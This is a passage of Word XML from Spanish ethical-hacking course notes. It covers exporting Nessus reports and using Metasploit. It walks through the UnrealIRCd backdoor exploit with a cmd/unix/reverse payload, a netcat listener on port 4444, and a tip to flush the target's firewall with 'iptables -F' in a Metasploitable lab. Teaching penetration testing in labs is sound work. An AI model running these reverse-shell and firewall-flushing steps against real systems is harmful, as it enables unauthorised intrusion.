        <w:t>Exportar resultados de Nessus:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Para exportar el informe de Nessus</w:t>
      </w:r>
      <w:r w:rsidR="00D41E7C">
        <w:t xml:space="preserve"> entramos en el resultado del escaneo deseado y pulsamos en Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BAC773" w14:textId="2B8B30D3" w:rsidR="00D41E7C" w:rsidRDefault="00D41E7C" w:rsidP="00314D04">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41E7C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2582D6EA" wp14:editId="699F9E5C">
            <wp:extent cx="5400040" cy="135826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358265"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DCDCBB" w14:textId="2E5CA113" w:rsidR="00D41E7C" w:rsidRDefault="00DF477E" w:rsidP="00314D04">
      <w:r w:rsidRPr="00DF477E">
        <w:t>Podemos seleccionar si lo queremos en HTML, PDF y CSV, ideal para adjuntarlo en nuestro reporte de Hacking Ético</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329C1BA9" w14:textId="22451D15" w:rsidR="00DF477E" w:rsidRDefault="00D75F04" w:rsidP="00D75F04">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D75F04">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Si queremos quitar la marca de agua del HTML, podemos Inspeccionar elemento y buscar la etiqueta watermark y simplemente hacemos click derecho y </w:t>
      </w:r>
      <w:r w:rsidRPr="00D75F04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Delete Node</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5079762F" w14:textId="5EB7D4D2" w:rsidR="00D75F04" w:rsidRPr="00D75F04" w:rsidRDefault="00D75F04" w:rsidP="00D75F04">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D75F04">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D6C5DC5" wp14:editId="79357970">
            <wp:extent cx="5400040" cy="1135380"/>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135380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6999B780" w14:textId="1199D453" w:rsidR="00D75F04" w:rsidRDefault="00D75F04" w:rsidP="00D75F04"/>
    <w:p w14:paraId="404DBFEF" w14:textId="7D346447" w:rsidR="00C248B3" w:rsidRDefault="00C248B3" w:rsidP="00E961D1">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Explotación y Hacking de Hosts</w:t>
      </w:r>
      <w:r w:rsidRPr="00C248B3">
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF7FAD7" w14:textId="77777777" w:rsidR="00C248B3" w:rsidRPr="00C248B3" w:rsidRDefault="00C248B3" w:rsidP="00C248B3"/>
    <w:p w14:paraId="2B242A61" w14:textId="7183E459" w:rsidR="0065449D" w:rsidRPr="00E56D03" w:rsidRDefault="0065449D" w:rsidP="0065449D">
      <w:pPr>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Metasploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00E56D03">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55733890" w14:textId="6983AD0D" w:rsidR="00C248B3" w:rsidRDefault="0065449D" w:rsidP="0065449D">
      <w:r>
        <w:t>Framework (conjunto de programas para el ataque). Se fundamenta en módulos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B92B3A5" w14:textId="18C8D3C8" w:rsidR="0065449D" w:rsidRDefault="0065449D" w:rsidP="0065449D">
      <w:r>
        <w:t>Contiene los 3 tipos de Payloads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7153BB" w14:textId="48C1A391" w:rsidR="0065449D" w:rsidRDefault="0065449D" w:rsidP="0065449D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Singles. No depende de Met</w:t>
      </w:r>
      <w:r w:rsidR="00616051">
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:t>ploit.</w:t>
      </w:r>
      <w:r w:rsidR="004560FC">
        <w:t xml:space="preserve"> Son autosuficientes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C6AB08" w14:textId="271D6C4A" w:rsidR="0065449D" w:rsidRDefault="000A4CD6" w:rsidP="0065449D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Stagers: Crean la conexión para usar los Stages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED026E1" w14:textId="78B93CA2" w:rsidR="000A4CD6" w:rsidRDefault="000A4CD6" w:rsidP="0065449D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Stages: Atacan, es decir, ya usando la conexión del stager, ahora permite atacar de manera avanzada, un ejemplo es Meterpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75580244" w14:textId="420547AF" w:rsidR="00E4059A" w:rsidRDefault="00E4059A" w:rsidP="00E4059A">
      <w:r>
        <w:t xml:space="preserve">Para entrar en Metasploit, podemos usar: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4059A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A1650D" w14:textId="59D7EC4B" w:rsidR="000A4CD6" w:rsidRDefault="002C22CA" w:rsidP="000A4CD6">
      <w:r w:rsidRPr="00E4059A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Connect:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4059A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Hace lo mismo que Netcat, establece una conexión</w:t>
      </w:r>
      <w:r w:rsidR="00E4059A">
        <w:t xml:space="preserve"> TCP con otro nodo (host) de la red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B90EE6F" w14:textId="5C32B231" w:rsidR="00E4059A" w:rsidRPr="00E4059A" w:rsidRDefault="00E4059A" w:rsidP="000A4CD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4059A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>onnect (ip del nodo) (puerto a usar)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9176F6" w14:textId="1FEAF771" w:rsidR="00E4059A" w:rsidRDefault="00E4059A" w:rsidP="000A4CD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4059A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>connect 192.168.1.30 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14236446" w14:textId="32A36B61" w:rsidR="00E4059A" w:rsidRPr="00E4059A" w:rsidRDefault="00E4059A" w:rsidP="000A4CD6">
      <w:r w:rsidRPr="00E4059A">
        <w:t>Para ello es necesario que el otro host esté escuchando, el otro host debe haber usado el comando de NetCat:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DADC854" w14:textId="425B3D6F" w:rsidR="00E4059A" w:rsidRDefault="00E4059A" w:rsidP="000A4CD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Nc -l -p (puerto)  -&gt; nc -l -p 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415092F5" w14:textId="323C7DF1" w:rsidR="00E4059A" w:rsidRDefault="00E4059A" w:rsidP="00E4059A">
      <w:r w:rsidRPr="00E4059A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Search:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4059A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Nos permite buscar entre los miles de exploits que tiene Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B84557" w14:textId="5893A460" w:rsidR="00E4059A" w:rsidRPr="00E4059A" w:rsidRDefault="00E4059A" w:rsidP="00E4059A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4059A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Search (nombre del exploit que busquemos)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3315E22C" w14:textId="1140D84E" w:rsidR="00E4059A" w:rsidRPr="00E4059A" w:rsidRDefault="00E4059A" w:rsidP="00E4059A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4059A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Search unrealircp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB6D909" w14:textId="6EF354EE" w:rsidR="00E4059A" w:rsidRDefault="00E4059A" w:rsidP="00E4059A">
      <w:r w:rsidRPr="00E4059A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57264892" wp14:editId="25B369EC">
            <wp:extent cx="5400040" cy="2092325"/>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092325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="080E1245" w14:textId="1EDF9272" w:rsidR="00E4059A" w:rsidRDefault="00E4059A" w:rsidP="00E4059A"/>
    <w:p w14:paraId="0201EDCB" w14:textId="565DD52F" w:rsidR="00E4059A" w:rsidRDefault="00E4059A" w:rsidP="00E4059A">
      <w:r>
        <w:t>Como vemos, nos muestra el nombre y la ruta donde lo guarda, esto nos lleva a hablar del siguiente comando.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C841F1" w14:textId="65969A88" w:rsidR="00E4059A" w:rsidRDefault="00E4059A" w:rsidP="00E4059A"/>
    <w:p w14:paraId="5DB34765" w14:textId="205E89FF" w:rsidR="00E4059A" w:rsidRDefault="00E4059A" w:rsidP="00E4059A">
      <w:r w:rsidRPr="00693DF4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Use: </w:t>
      </w:r>
      <w:r>
        <w:t>Permite cargar el exploit</w:t>
      </w:r>
      <w:r w:rsidR="00F93190">
        <w:t xml:space="preserve"> que vayamos a usar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B17B5E" w14:textId="503B1555" w:rsidR="00E4059A" w:rsidRPr="00F93190" w:rsidRDefault="00F93190" w:rsidP="00E4059A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F93190">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="00E4059A" w:rsidRPr="00F93190">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>se (nombre del exploit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9E8FAE" w14:textId="77777777" w:rsidR="00F93190" w:rsidRDefault="00F93190" w:rsidP="00E4059A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F93190">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="00E4059A" w:rsidRPr="00F93190">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">se </w:t>
      </w:r>
      <w:r w:rsidRPr="00F93190">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">use exploit/unix/irc/unreal_ircd_3281_backdoor </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6246AA30" w14:textId="0CFB0D29" w:rsidR="00E4059A" w:rsidRDefault="00F93190" w:rsidP="00E4059A">
      <w:r w:rsidRPr="00F93190">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6633177F" wp14:editId="004E2292">
            <wp:extent cx="5400040" cy="193167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931670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1634969E" w14:textId="156B719D" w:rsidR="00F93190" w:rsidRDefault="00F93190" w:rsidP="00E4059A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para cambiar de exploit, simplemente usamos </w:t>
      </w:r>
      <w:r w:rsidRPr="00F93190">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FAB68B" w14:textId="0FD19113" w:rsidR="00140511" w:rsidRPr="00693DF4" w:rsidRDefault="00B87216" w:rsidP="00E4059A">
      <w:r>
        <w:t xml:space="preserve">A continuación, una vez cargado el exploit, podemos usar la opción </w:t>
      </w:r>
      <w:r w:rsidRPr="00B87216">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>show option</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidRPr="00B87216">
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> show advanced</w:t>
      </w:r>
      <w:r w:rsidRPr="00B87216">
        <w:t>. Normalmente con show option, que muestra las opciones básicas, es más que necesario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7444EC31" w14:textId="53DD8250" w:rsidR="00B87216" w:rsidRDefault="00B87216" w:rsidP="00E4059A">
      <w:r>
        <w:t>Que nos permitirá ver las opciones de este exploit</w:t>
      </w:r>
      <w:r w:rsidR="00140511">
        <w:t xml:space="preserve">. Ahora con el comando </w:t>
      </w:r>
      <w:r w:rsidR="00140511" w:rsidRPr="00140511">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r w:rsidR="00140511">
        <w:t xml:space="preserve"> introducimos la opciones, por ejemplo RHOST, remote host o host a atacar, en este caso sería:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DD244E" w14:textId="6DE17874" w:rsidR="00140511" w:rsidRPr="00140511" w:rsidRDefault="00140511" w:rsidP="00E4059A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00140511">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>set RHOST 192.168.52.130</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43093C5E" w14:textId="7DD6FA31" w:rsidR="00140511" w:rsidRDefault="00140511" w:rsidP="00E4059A">
      <w:r w:rsidRPr="00140511">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4603CA1C" wp14:editId="1AEA4118">
            <wp:extent cx="5400040" cy="2105660"/>
            <wp:effectExtent l="0" t="0" r="0"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105660"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4913FA" w14:textId="7D902021" w:rsidR="00140511" w:rsidRDefault="00140511" w:rsidP="00E4059A"/>
    <w:p w14:paraId="1D2D88AD" w14:textId="23743169" w:rsidR="00140511" w:rsidRDefault="00140511" w:rsidP="00E4059A">
      <w:r>
        <w:t>Una vez esté todo configurado, será necesario indicar a Metasploit el Payload antes de correr el exploit, pues, como ya sabemos, un exploit es solo un programa que abre la brecha de la seguridad pero, realmente es el Payload el código que ejecuta una acción, es decir, es el verdadero ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9840D1" w14:textId="7FB73A8D" w:rsidR="00140511" w:rsidRDefault="00140511" w:rsidP="00E4059A">
      <w:r>
        <w:t xml:space="preserve">Para mostrar los payloads que tiene Metasploit en su repositorio y que son compatibles con el exploit que estamos configurando, usamos el comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00140511">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>show payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC8ED3E" w14:textId="4F8D9EF1" w:rsidR="00140511" w:rsidRDefault="00140511" w:rsidP="00E4059A">
      <w:r w:rsidRPr="00140511">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DA71A6A" wp14:editId="34E1F534">
            <wp:extent cx="5400040" cy="2776855"/>
            <wp:effectExtent l="0" t="0" r="0"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776855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07177393" w14:textId="29B970B9" w:rsidR="003D3497" w:rsidRDefault="003D3497" w:rsidP="00E4059A"/>
    <w:p w14:paraId="4A262407" w14:textId="4BCC852B" w:rsidR="003D3497" w:rsidRDefault="003D3497" w:rsidP="00E4059A">
      <w:r>
        <w:t>Ahora podemos seleccionar el payload con</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001D99B1" w14:textId="294DB28D" w:rsidR="003D3497" w:rsidRPr="003D3497" w:rsidRDefault="003D3497" w:rsidP="00E4059A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="003D3497">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">et payload (nombre) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B612775" w14:textId="2291FFCE" w:rsidR="003D3497" w:rsidRDefault="003D3497" w:rsidP="00E4059A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="003D3497">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>et payload payload/cmd/unix/reverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560F45DF" w14:textId="1240CA70" w:rsidR="003D3497" w:rsidRDefault="003D3497" w:rsidP="00E4059A">
      <w:r>
        <w:t>Ahora al hacer show options, nos saldrán las opciones del payload, y ahora tendremos otras cosas que rellenar, por ejemplo, un LHOST (host que escucha, normalmente será nuestra IP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B53CED" w14:textId="5AA2F697" w:rsidR="003D3497" w:rsidRDefault="003D3497" w:rsidP="00E4059A">
      <w:r w:rsidRPr="003D3497">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="166C55C5" wp14:editId="0CF97087">
            <wp:extent cx="5400040" cy="2684780"/>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684780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DAD8C5" w14:textId="2DE419D0" w:rsidR="003D3497" w:rsidRDefault="003D3497" w:rsidP="00E4059A">
      <w:r>
        <w:t xml:space="preserve">Simplemente ponemos </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3497">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>set LHOST (ip)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; set LHOST 192.168.52.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB7CEF5" w14:textId="1F8B5B15" w:rsidR="003D3497" w:rsidRDefault="003D3497" w:rsidP="00E4059A"/>
    <w:p w14:paraId="4031F272" w14:textId="7CB0DED6" w:rsidR="003D3497" w:rsidRDefault="003D3497" w:rsidP="00E4059A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Y una vez esté todo configurado podemos correr el exploit con el comando </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3497">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2861A8A9" w14:textId="5C61EBF2" w:rsidR="00BA62B8" w:rsidRPr="00BA62B8" w:rsidRDefault="00BA62B8" w:rsidP="00BA62B8">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA62B8">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Recuerda que si estás probando con Metasploiteable Ubuntu, es importante que borres las normas del firewall con:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3856D0BC" w14:textId="791A5141" w:rsidR="00BA62B8" w:rsidRPr="00BA62B8" w:rsidRDefault="00E961D1" w:rsidP="00BA62B8">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00BA62B8" w:rsidRPr="00BA62B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>udo iptables -F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49358A9C" w14:textId="05916C3F" w:rsidR="00BA62B8" w:rsidRPr="00BA62B8" w:rsidRDefault="00BA62B8" w:rsidP="00BA62B8">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA62B8">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Y luego adquirir una nueva ip con:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F2562C" w14:textId="7A78A42E" w:rsidR="00BA62B8" w:rsidRPr="00BA62B8" w:rsidRDefault="00E961D1" w:rsidP="00BA62B8">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00BA62B8" w:rsidRPr="00BA62B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>udo dhclient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71562B43" w14:textId="54BEE937" w:rsidR="00BA62B8" w:rsidRDefault="00BA62B8" w:rsidP="00BA62B8">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BA62B8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EFE340E" wp14:editId="2DBA8DA3">
            <wp:extent cx="4561223" cy="33528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70983" cy="3359974"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B05D58C" w14:textId="28C2DB69" w:rsidR="00BA62B8" w:rsidRDefault="00BA62B8" w:rsidP="00BA62B8">
      <w:r>
